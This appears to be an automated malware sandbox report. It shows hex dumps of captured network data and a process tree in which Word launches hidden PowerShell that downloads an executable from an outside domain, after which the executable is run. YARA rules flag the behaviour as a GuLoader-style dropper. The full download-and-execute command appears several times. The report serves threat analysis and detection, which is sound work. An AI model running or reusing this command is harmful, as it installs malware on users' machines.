                                                          2023-03-18 04:35:12 UTC1141INData Raw: f6 ad 6a 64 c6 03 78 96 7f 8a 29 35 e3 a3 8a b5 8b 2f ee e3 34 6f 27 aa fa a9 58 cd 16 b7 92 f2 de b8 c9 4e 88 d5 6c e1 8e 92 ed ba 33 ad d8 89 7c 7e a1 8d 2d be ba f1 78 2b 2a 1d ef a6 6c 6b f5 f6 67 34 5e 9b f1 07 49 e9 fc 6a e4 44 42 8f a9 9d 5c ad 7e a9 a3 46 0e 91 08 85 6c 9d ee c3 46 d1 84 29 10 5c 01 fb e3 99 68 c0 a9 0e 17 96 62 a8 e3 03 e3 7b 0e c3 e1 bd b1 90 8f 02 5b 37 77 47 ec 05 7f 51 8a 16 bf 24 2d d7 3c 8b 36 82 9f 43 4b c2 5f 46 a5 8d e7 d1 62 cd 0b f8 fb 15 fc 7d 11 7f bf 2a ad e5 7c 8d d6 a1 ae 65 a3 5f 97 39 be 84 69 bf 81 bf 2f e3 ef 37 65 19 af 60 19 df 42 e8 ab d2 12 ce 6b e8 ff 36 e6 fd 1d 2e 5a f8 ae 10 2d 7c 97 03 de 10 80 37 38 e0 7b 02 f0 3d 0e 78 53 00 de e4 80 ef 0b 00 3a 5a 75 b4 85 ec 4f 33 c9 1e 8c 09 ef aa f1 3d f0 04 90
                                                          Data Ascii: jdx)5/4o'XNl3|~-x+*lkg4^IjDB\~FlF)\hb{[7wGQ$-<6CK_Fb}*|e_9i/7e`Bk6.Z-|78{=xS:ZuO3=
                                                          2023-03-18 04:35:12 UTC1157INData Raw: 23 7c 45 9e f2 d0 e4 4a e2 9d 7a ee 8c d9 f5 4c bb 52 a6 4d 8b 7b 38 d5 ee 61 85 81 97 52 ef 64 46 5a d3 72 66 00 a3 b1 c9 30 0c e6 22 a7 80 27 c5 c8 64 9c 26 a1 b6 20 d0 28 ad c9 79 22 9e 4d be 24 ff ce 81 25 f8 bb 58 3c 28 3c 2d 95 e1 99 16 c8 e4 3e b3 a4 27 0e ab 20 a4 c4 ae 15 c4 2b b1 11 6f eb 56 27 1c a8 89 8c b6 59 f3 0a 71 45 ea a4 ab fc 99 10 62 02 6b 8f dd e8 04 f5 1c d4 47 97 c7 c1 5b 24 bf cd 88 5d b3 1c ed 8b 66 b7 2f 07 da b9 55 7c 55 fc 75 f1 f2 65 d5 ce ae ea ab ca ef 64 76 d8 d9 31 be 18 7f 0a bb c1 19 6e 86 86 d3 5c 78 75 74 88 ee c8 39 40 23 09 b7 ba 37 3d 28 c3 c4 c9 ea 42 e0 26 0a ab 9b 69 4a 1b 28 bf 21 2f 24 a0 4c 2b d7 78 2b e7 f7 d1 d1 66 4c 97 6a d0 c8 e1 2e 65 6c e0 21 41 1a 8e 68 de 20 76 5b 5e b0 1a 96 b7 09 14 bc 34 96 ef d1
                                                          Data Ascii: #|EJzLRM{8aRdFZrf0"'d& (y"M$%X<(<->' +oV'YqEbkG[$]f/U|Uuedv1n\xut9@#7=(B&iJ(!/$L+x+fLj.el!Ah v[^4
                                                          2023-03-18 04:35:12 UTC1173INData Raw: 3f c4 f0 ce 04 a0 63 90 96 2f 9d c5 d4 67 5a d6 09 90 0a d6 6b 25 25 80 4e 0b d4 ef 96 60 96 94 44 72 13 20 4f ee 49 30 c7 32 89 2c 42 3b 8b ed aa 84 53 2e 33 ce 4f 24 b4 a3 b9 f4 66 c2 59 57 18 29 49 04 7f d8 a8 61 1f 2f 58 e8 f6 f8 7c 9b 08 52 a8 5d 66 88 bf 26 42 88 7f 21 65 21 3a 93 16 de 66 b8 ff 3c 4e 95 0e 91 f5 ab d0 37 c2 08 3e cd ad 92 8f 93 0a 29 3d 9d 04 e3 d1 97 49 c5 d4 fe 6d 12 f4 ba 7f 20 15 7d b5 4a 02 ea cc a7 d2 a8 3a d0 1b c7 d7 81 70 bf 4f 06 9f 6f a7 bd 94 8f 1b eb 6f f7 25 03 fd 1c fd 79 0f 29 cc 10 cc 9c f9 23 39 29 40 22 0d eb 36 a1 b4 45 dd 96 94 b6 ab db 96 d2 9e 75 3b 52 3a b8 6e 37 4a 47 d7 bd 23 40 21 93 eb f6 a7 74 5a dd c1 94 33 af 2e d4 96 95 48 9f 44 ba 1b e9 c1 ba 77 05 d0 1c 4b 81 50 3a 20 fd 5a 05 0e 1b 1f e7 a7 1c a6
                                                          Data Ascii: ?c/gZk%%N`Dr OI02,B;S.3O$fYW)Ia/X|R]f&B!e!:f<N7>)=Im }J:pOoo%y)#9)@"6Eu;R:n7JG#@!tZ3.HDwKP: Z
                                                          2023-03-18 04:35:12 UTC1189INData Raw: e3 c8 3b 64 0b 45 59 1c f9 87 94 90 79 ae c9 1c 35 a3 b2 79 ae 19 1c 75 a3 b2 f9 ae d9 1c 0d a5 b2 f9 ae fb 39 9a 44 d1 bd ae 47 cc 98 51 cd 05 ae 8d 1c 2d a3 b2 05 ae a7 39 7a 82 ca 16 ba 76 71 f4 22 95 2d 74 bd ca d1 11 2a bb cf f5 26 47 5f 50 d9 7d ae 77 39 fa 95 ca ee 77 7d cc 91 76 e7 16 8a be e0 28 fc ce 12 b2 c8 75 c1 4c 03 95 2d 72 5d e1 a8 29 95 3d e0 ba ca 51 4f 2a 7b c0 25 e5 32 94 49 65 0f ba 9c 1c 15 50 d9 83 2e 1f 47 4b ee ac 17 f9 90 2b 8a a3 4d 77 36 a2 a8 06 47 2f 52 77 8b 5d 89 1c bd 4f dd 2d 76 a5 72 f4 1d 95 2d 71 b5 e0 48 1a ba 85 a2 f6 1c 55 1a 5a 42 96 ba ba 73 14 4f 65 4b 5d fd 39 6a 49 65 cb 5c 43 39 ea 43 65 cb 5c 63 38 ca 1a 7a 55 5a ee ca e1 68 fa d0 eb 14 4d e3 68 21 75 b7 c2 55 c4 d1 63 d4 dd 0a d7 0a 8e 9e a3 b2 95 ae 47 39
                                                          Data Ascii: ;dEYy5yu9DGQ-9zvq"-t*&G_P}w9w}v(uL-r])=QO*{%2IeP.GK+Mw6G/Rw]O-vr-qHUZBsOeK]9jIe\C9Ce\c8zUZhMh!uUcG9
                                                          2023-03-18 04:35:12 UTC1205INData Raw: a8 e2 dc 01 f0 78 26 80 6a 9f 32 0a b1 8b 98 24 88 8b 5f 46 0f 17 e5 f7 f7 40 a5 38 ba 2f 90 30 3b f1 e4 61 a4 06 33 53 15 aa 27 3d a5 cd 89 07 b9 64 c4 ea 8c d0 60 d9 5d c8 9a 38 4c 13 2e ea 2f ba aa 3b 97 1d 2f 6c 95 47 bf 3c f6 60 a4 62 b8 4b fd 2a 99 12 23 18 4f dc 5b c4 52 86 20 21 8a e5 0a 23 17 ec 64 11 81 be 66 29 24 cd 49 1c 90 9a 2e 4e a2 ed 91 61 a6 0c 11 29 d1 f7 a4 72 93 19 33 42 f6 76 b1 e8 db 2b 90 0a ac 86 84 24 0f ae fa 90 10 3c b7 91 a7 9b 30 78 d1 8e 8a 9e 68 86 ed 99 c2 24 9a 04 0d 29 ed bf 09 02 62 a4 98 2a a7 b7 67 2a a9 b1 6c 2e b3 35 93 2b 21 cf 40 f0 8d 93 d9 1c ca 16 1a b4 17 14 8b f9 10 41 3a ab 07 c2 24 4c e9 2f 17 c7 cb 19 d7 35 54 ee 2b 1a d6 21 42 a8 ba 90 7a 6e b1 1c 22 a1 32 db 8b 93 6e 95 80 c7 a8 0d 17 4a 57 b9 77 6a 34
                                                          Data Ascii: x&j2$_F@8/0;a3S'=d`]8L./;/lG<`bK*#O[R !#df)$I.Na)r3Bv+$<0xh$)b*g*l.5+!@A:$L/5T+!Bzn"2nJWwj4
                                                          2023-03-18 04:35:12 UTC1221INData Raw: 55 61 12 b5 61 12 10 5d 31 92 73 18 1f f4 48 d0 38 81 51 8b 72 53 d1 95 2d 48 22 a6 2c c1 38 0c 3f e2 f2 30 be 33 37 01 d3 c1 66 6e 22 b9 46 d6 71 b3 16 5b 73 a4 af 03 c6 e4 d1 4c 12 9e 5c cb c5 c5 41 4a ec 57 92 20 25 09 52 92 20 a5 e6 28 44 ee 95 b1 a1 df 3f ff 0f 47 15 de 6f b1 90 9f 21 5e 69 6f 9b b9 4d 3f df 4f d3 17 ab d8 77 91 30 78 94 9c 3f 24 e7 47 08 dc 4d ce 27 48 36 7c 92 c0 7d 04 1e 80 02 de 43 f4 1b 48 27 3f 28 83 e2 41 5a 93 98 3b 48 53 d7 dc 3d 14 f3 8b 04 be 4a e0 1b 04 be 4d e0 11 8a f0 26 29 f7 9b 08 17 d9 37 77 2d e1 6f 15 fc ad 84 df 20 38 65 30 f3 98 64 f0 18 d1 6f 14 3a 1b 03 37 0b 7e 33 e1 b7 0a 4e 2b d8 73 77 08 7e 07 c5 7d 5c e2 3e 4e f4 3b 85 7e a7 ae f7 93 22 e5 1e d0 ce 9f c5 68 ed b6 3d 41 06 0c 91 f1 c7 cb 1d 33 cf 26 48 0d
                                                          Data Ascii: Uaa]1sH8QrS-H",8?037fn"Fq[sL\AJW %R (D?Go!^ioM?Ow0x?$GM'H6|}CH'?(AZ;HS=JM&)7w-o 8e0do:7~3N+sw~}\>N;~"h=A3&H
                                                          2023-03-18 04:35:12 UTC1237INData Raw: f8 f1 a6 6c 17 f1 e0 19 7f 8e da 5a d3 e5 40 7e 4a bd 3f ee 40 c6 45 4d 9d a0 d7 e8 f4 53 f3 72 74 e9 33 35 a9 b9 39 f9 53 e3 0b 32 8c 79 9a 7c 83 7e aa 79 c5 aa cb 2f 97 ff b2 76 f9 a5 4f 76 4e 9d 98 a3 37 a6 e7 ca c7 1b 8c 99 39 05 f2 30 45 e8 93 53 b5 ba 82 59 9a 0c 20 64 2e 35 7a d4 53 8b fa 47 4c 1d a7 c9 d5 a4 eb 35 42 7c 88 36 93 d9 9f ae ec c1 76 c4 ef e8 19 11 97 ac c2 5b 68 f2 24 f6 9b 0c 01 79 44 7a f9 34 da 0f 3c 2e 40 a1 e0 d2 00 37 46 cc e3 8a ac bf f1 10 92 83 bf a9 10 f0 24 b3 0f 1c 7e 6b 5c 88 42 91 91 05 4e fd f9 19 f4 27 16 42 e2 c6 25 07 a4 c4 c5 12 5d b3 c5 4d 21 eb 2e 1b 5c 22 a1 bb 67 8b 23 74 30 29 0a 70 6a 42 e7 6c 8b 23 74 9e 36 b8 64 42 e7 63 8b 23 74 72 c0 9d 77 01 1c fb 9d 09 1c 8b b7 44 7c 3c 00 2f 90 10 fb ed e5 60 c5 cd 9f
                                                          Data Ascii: lZ@~J?@EMSrt359S2y|~y/vOvN790ESY d.5zSGL5B|6v[h$yDz4<.@7F$~k\BN'B%]M!.\"g#t0)pjBl#t6dBc#trwD|</`
                                                          2023-03-18 04:35:12 UTC1253INData Raw: 81 18 52 cf 1f 69 6b 16 c6 00 9e 47 26 8a 27 f0 39 ca 3c bd 52 51 12 e2 67 c7 42 8c e5 be ab 25 ff 63 de 17 39 ff 0d f8 f2 10 fc f5 57 33 ff 63 b7 af 79 f4 14 b7 e4 02 83 09 26 5d 7d 36 13 0c d7 8f 47 73 91 9b 81 c0 c4 b8 eb 4d c9 d7 25 ee 6a 36 3a f0 5e 2e c2 a5 4f 48 44 ef e6 1b e1 51 74 3a 66 76 66 69 9a e9 f8 1c 45 90 82 b6 6c c2 ce 49 9a a7 f4 3a 5c 63 da 6b fa d0 4b 2c fe f2 e3 72 37 7f 9d a8 48 6b 35 7f 76 da a1 fa 77 b0 ff c3 f5 79 40 d8 85 db 19 b5 6e 18 c5 ad e2 1d a4 05 fd a2 90 f6 5b 31 a9 44 bc 7c c6 68 c3 6b 54 32 35 00 a5 e3 58 9c 31 05 69 68 e7 3f 6a 36 e4 50 2a 71 f9 16 a5 84 f7 ff 6d ab 34 58 29 0d 37 53 d1 31 53 aa 60 1b 0d d3 58 13 59 d4 6b dd 83 34 cf 0d 16 f7 f5 30 61 6a dc 34 61 2e 79 dc 50 72 4e 4f 83 5a bb f5 33 14 24 2c d0 f0 f7
                                                          Data Ascii: RikG&'9<RQgB%c9W3cy&]}6GsM%j6:^.OHDQt:fvfiElI:\ckK,r7Hk5vwy@n[1D|hkT25X1ih?j6P*qm4X)7S1S`XYk40aj4a.yPrNOZ3$,
                                                          2023-03-18 04:35:12 UTC1269INData Raw: 17 a3 ab fe 58 ce 5d 95 27 1d 41 43 fe 3d 7e 21 98 f3 51 7f f1 f7 c0 20 ec 59 fc ef 18 cc 8e 77 ba a0 dd b7 93 3d 09 ff c1 2d 3d 7b aa 39 7f 6f 33 c4 8d 6f 34 e0 dc 7c e0 52 f3 2a c1 92 c5 f2 8a a5 ee d2 04 d3 e6 98 3a 76 68 12 de 38 7a 37 15 d7 b7 8c 63 c3 18 df a3 f0 7b 32 7e b7 1b df a5 5c 12 61 a2 3c a7 7c 5f 71 3e 9e 2f 5f ce 6b ea 75 0f 9d 5b be ec 7d 0e f9 fe a9 0f fe 46 be 9c f9 01 c9 97 fb 9f 43 f9 f2 db e7 5a c8 97 8f 7f c0 f2 e5 e7 ff 30 d9 ea e4 0f f8 be 24 8b 29 5f ce b6 d2 9b eb 63 c2 e5 cb 0c 6b b8 7c f9 3e 05 26 fa 2b f9 72 ec 73 2c 5f 1e 5d de 8a 7c 19 76 3f 1b 0c 07 10 f9 79 22 ed 03 be f0 25 91 d7 57 79 80 fb 3c 71 a1 7c 2f d9 7e 5c bb e7 0c 6e bf 62 79 6b dc 7e 6e c4 7a 89 e7 d9 c4 8e e5 16 79 e3 db a6 e5 54 c6 a7 cf 1a 65 3c d8 6a 19
                                                          Data Ascii: X]'AC=~!Q Yw=-={9o3o4|R*:vh8z7c{2~\a<|_q>/_ku[}FCZ0$)_ck|>&+rs,_]|v?y"%Wy<q|/~\nbyk~nzyTe<j
                                                          2023-03-18 04:35:12 UTC1285INData Raw: 3b 57 c6 66 f5 c9 f9 0a 2d 6e d7 67 17 9e 98 71 2f d4 71 22 2d e8 d0 f7 0f f3 45 a7 b9 32 f6 66 aa 2f 56 a5 6c 80 1f 2e 75 e8 b1 91 be 81 69 58 4b 61 3d b1 f7 33 ea 93 c3 68 e7 01 8a df 20 7e 1f 42 2b b4 4b 39 ea cc d8 f4 e8 52 9c 41 7d 79 dd bf 0c 08 26 b0 ea 74 18 bf f6 0d 99 ab 1f 4b 0b 62 2c 5f 05 0a df 8f b5 4c 8f 43 4d 38 a5 1a a3 95 cd 02 11 03 e3 54 e4 f8 a2 3b 49 44 d7 a9 4f fe 60 a1 43 01 9a 6f cc bc 68 4f 73 94 3b dd 2c cf 3b 94 2e d3 d0 ed a7 b5 8c 0d 05 47 42 59 de 23 44 f7 a9 9e 7f 50 e4 b7 aa 80 82 f2 16 94 90 19 05 35 87 e4 b7 cf 30 7f d4 24 dd 7e 46 7a 1b 04 b1 a0 df f0 84 bd c3 6c 61 5c 78 0b d5 f9 18 63 88 3a e1 03 18 e4 b9 b3 6c 0f 83 9a f1 3a 8a 13 4a d0 d0 97 41 ff 7b 9d f5 f1 e5 bc ca 83 e4 14 b7 1e 56 70 71 49 aa 94 61 03 a2 31 34
                                                          Data Ascii: ;Wf-ngq/q"-E2f/Vl.uiXKa=3h ~B+K9RA}y&tKb,_LCM8T;IDO`CohOs;,;.GBY#DP50$~Fzla\xc:l:JA{VpqIa14
                                                          2023-03-18 04:35:12 UTC1301INData Raw: 97 2a b3 1a 97 5c 36 f9 ee 2f 1c 57 3b 6b c6 dd d1 6b df f2 bb 1c 1f 8e eb ed dc f0 8c f5 f3 7d 19 9b 23 fb dd f3 fa e1 de eb 2f 7a 66 7b ee e7 ab 2e 1f f7 d4 c0 1e e9 53 cb 12 2e 9c 7f fd b7 8f b5 7e f6 c2 8c b5 99 bf bc 7f c9 a3 6d df 38 f1 ef 7f fd 50 b8 cd 92 fc d0 e2 bc d2 aa d8 b7 ee 39 af f8 97 fc 97 9e ae 8f 5d fd 23 ab f9 c7 a5 ff 5a 1a ad d3 37 1c 6a b8 75 49 75 7d ec ba cf a2 d9 98 c4 cb dc ad 74 e6 b1 3a 7d dc ed 31 b7 0c 5e 33 72 fc 33 d5 fd 67 98 36 d7 15 c5 e8 cc db e8 f4 95 27 87 66 f7 fe f4 ad d8 97 f6 46 b3 7e 9f b4 e8 5a 78 e6 60 df c4 bd 87 63 6b e7 ab e6 6d 75 f2 ed 75 fa 76 3a fd 27 83 6e 18 7e 5f e6 13 49 77 f6 da 76 c3 19 e7 ac b2 0e af 7e 5a bd fa f9 23 57 3f df d0 7e e0 dd df bf 5a bc ab 83 e3 e5 c5 f1 ce ab 57 7c 17 bd f0 cf fe
                                                          Data Ascii: *\6/W;kk}#/zf{.S.~m8P9]#Z7juIu}t:}1^3r3g6'fF~Zx`ckmuuv:'n~_Iwv~Z#W?~ZW|
                                                          2023-03-18 04:35:12 UTC1317INData Raw: 2d ef be 3f 10 bd e2 bc 16 c3 29 d0 f4 44 e9 c3 88 57 29 55 7b 7b 48 3b 55 39 96 59 a4 b2 1f b1 a2 31 87 8a d5 06 54 c1 0c 87 c9 b0 94 4f b7 4e 1e 4b 7a d2 6c c7 ce 72 b9 de b6 2c c6 71 53 9d 97 b9 56 c6 3f 37 d9 95 d4 87 05 48 fc 10 5b 25 98 b0 e4 9b a1 73 94 80 3c f6 ec b4 f9 6b b1 62 9b 40 f9 f5 6a a8 ce 6d b8 61 82 dd 76 9e 89 a3 bb 61 e6 01 d7 3d 5c b7 e5 98 66 97 04 b3 4d 7f 5c ec 34 18 e7 00 20 2f 10 77 38 83 c4 52 dc ca 4a ea f9 4d ae ae 80 59 d3 81 11 29 c9 ff 49 ac ed 58 15 ee b4 b8 0e 64 28 be ef 51 f4 82 f6 43 c5 6d 1e 4f bc e2 3a a8 7c a1 73 62 51 56 6f 43 c9 77 6d c0 ab 00 6b b8 2b 80 f5 8a ac 26 0e d2 d1 b0 92 74 00 de 3a 24 12 c1 eb cd 80 2d 36 5f f2 55 ac 61 b8 36 53 9a 6c 6d 71 95 4c 93 e9 8c f0 09 ee 6c 1a f9 32 78 5e e1 53 08 8d 86 74
                                                          Data Ascii: -?)DW)U{{H;U9Y1TONKzlr,qSV?7H[%s<kb@jmava=\fM\4 /w8RJMY)IXd(QCmO:|sbQVoCwmk+&t:$-6_Ua6SlmqLl2x^St



                                                          Target ID:0
                                                          Start time:05:34:16
                                                          Start date:18/03/2023
                                                          Path:C:\Program Files\Microsoft Office\Office14\WINWORD.EXE
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Program Files\Microsoft Office\Office14\WINWORD.EXE" /Automation -Embedding
                                                          Imagebase:0x13f020000
                                                          File size:1423704 bytes
                                                          MD5 hash:9EE74859D22DAE61F1750B3A1BACB6F5
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:4
                                                          Start time:05:34:20
                                                          Start date:18/03/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
                                                          Imagebase:0x4a870000
                                                          File size:345088 bytes
                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:6
                                                          Start time:05:34:20
                                                          Start date:18/03/2023
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
                                                          Imagebase:0x13fb60000
                                                          File size:473600 bytes
                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000006.00000002.912243758.0000000001CF6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000006.00000002.911999906.0000000000200000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000006.00000002.911999906.0000000000200000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000006.00000002.911999906.000000000023E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000006.00000002.911999906.000000000023E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000006.00000002.911999906.000000000024F000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          Reputation:high

                                                          Target ID:7
                                                          Start time:05:34:27
                                                          Start date:18/03/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
                                                          Imagebase:0x4a8e0000
                                                          File size:345088 bytes
                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:9
                                                          Start time:05:34:27
                                                          Start date:18/03/2023
                                                          Path:C:\Users\user\AppData\Roaming\file.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\file.exe
                                                          Imagebase:0x400000
                                                          File size:676320 bytes
                                                          MD5 hash:A1AFEF77EEC567ADB1076E8679AF207B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Yara matches:
                                                          • Rule: JoeSecurity_GuLoader_2, Description: Yara detected GuLoader, Source: 00000009.00000002.1283953918.0000000006770000.00000040.00001000.00020000.00000000.sdmp, Author: Joe Security
                                                          • Rule: SUSP_NullSoftInst_Combo_Oct20_1, Description: Detects suspicious NullSoft Installer combination with common Copyright strings, Source: C:\Users\user\AppData\Roaming\file.exe, Author: Florian Roth (Nextron Systems)
                                                          Antivirus matches:
                                                          • Detection: 6%, ReversingLabs
                                                          Reputation:low

                                                          Target ID:10
                                                          Start time:05:34:27
                                                          Start date:18/03/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
                                                          Imagebase:0x4a8e0000
                                                          File size:345088 bytes
                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:12
                                                          Start time:05:34:27
                                                          Start date:18/03/2023
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
                                                          Imagebase:0x13f540000
                                                          File size:473600 bytes
                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 0000000C.00000002.925602681.000000000016E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 0000000C.00000002.925602681.000000000016E000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 0000000C.00000002.926137443.0000000001B46000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 0000000C.00000002.925602681.0000000000130000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 0000000C.00000002.925602681.0000000000130000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 0000000C.00000002.925602681.00000000001F5000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          Reputation:high

                                                          Target ID:13
                                                          Start time:05:34:38
                                                          Start date:18/03/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
                                                          Imagebase:0x4a8e0000
                                                          File size:345088 bytes
                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language
                                                          Reputation:high

                                                          Target ID:15
                                                          Start time:05:34:39
                                                          Start date:18/03/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
                                                          Imagebase:0x4a8e0000
                                                          File size:345088 bytes
                                                          MD5 hash:5746BD7E255DD6A8AFA06F7C42C1BA41
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:16
                                                          Start time:05:34:39
                                                          Start date:18/03/2023
                                                          Path:C:\Users\user\AppData\Roaming\file.exe
                                                          Wow64 process (32bit):true
                                                          Commandline:C:\Users\user\AppData\Roaming\file.exe
                                                          Imagebase:0x400000
                                                          File size:676320 bytes
                                                          MD5 hash:A1AFEF77EEC567ADB1076E8679AF207B
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:C, C++ or other language

                                                          Target ID:18
                                                          Start time:05:34:39
                                                          Start date:18/03/2023
                                                          Path:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:PowerShell -NoP -sta -NonI -W Hidden -ExecutionPolicy bypass -NoLogo -command "(New-Object System.Net.WebClient).DownloadFile('httPs://thekaribacruisecompany.com/file.exe','C:\Users\user\AppData\Roaming\file.exe')
                                                          Imagebase:0x13fa40000
                                                          File size:473600 bytes
                                                          MD5 hash:852D67A27E454BD389FA7F02A8CBE23F
                                                          Has elevated privileges:true
                                                          Has administrator privileges:true
                                                          Programmed in:.Net C# or VB.NET
                                                          Yara matches:
                                                          • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000012.00000002.953185169.0000000000280000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000012.00000002.953185169.0000000000280000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000012.00000002.955614868.0000000001BD6000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000012.00000002.953185169.00000000002BE000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: PowerShell_Susp_Parameter_Combo, Description: Detects PowerShell invocation with suspicious parameters, Source: 00000012.00000002.953185169.00000000002BE000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)
                                                          • Rule: Suspicious_PowerShell_WebDownload_1, Description: Detects suspicious PowerShell code that downloads from web sites, Source: 00000012.00000002.953185169.00000000002CF000.00000004.00000020.00020000.00000000.sdmp, Author: Florian Roth (Nextron Systems)

                                                          Target ID:19
                                                          Start time:05:35:09
                                                          Start date:18/03/2023
                                                          Path:C:\Windows\System32\cmd.exe
                                                          Wow64 process (32bit):false
                                                          Commandline:"C:\Windows\System32\cmd.exe" /C C:\Users\user\AppData\Roaming\file.exe
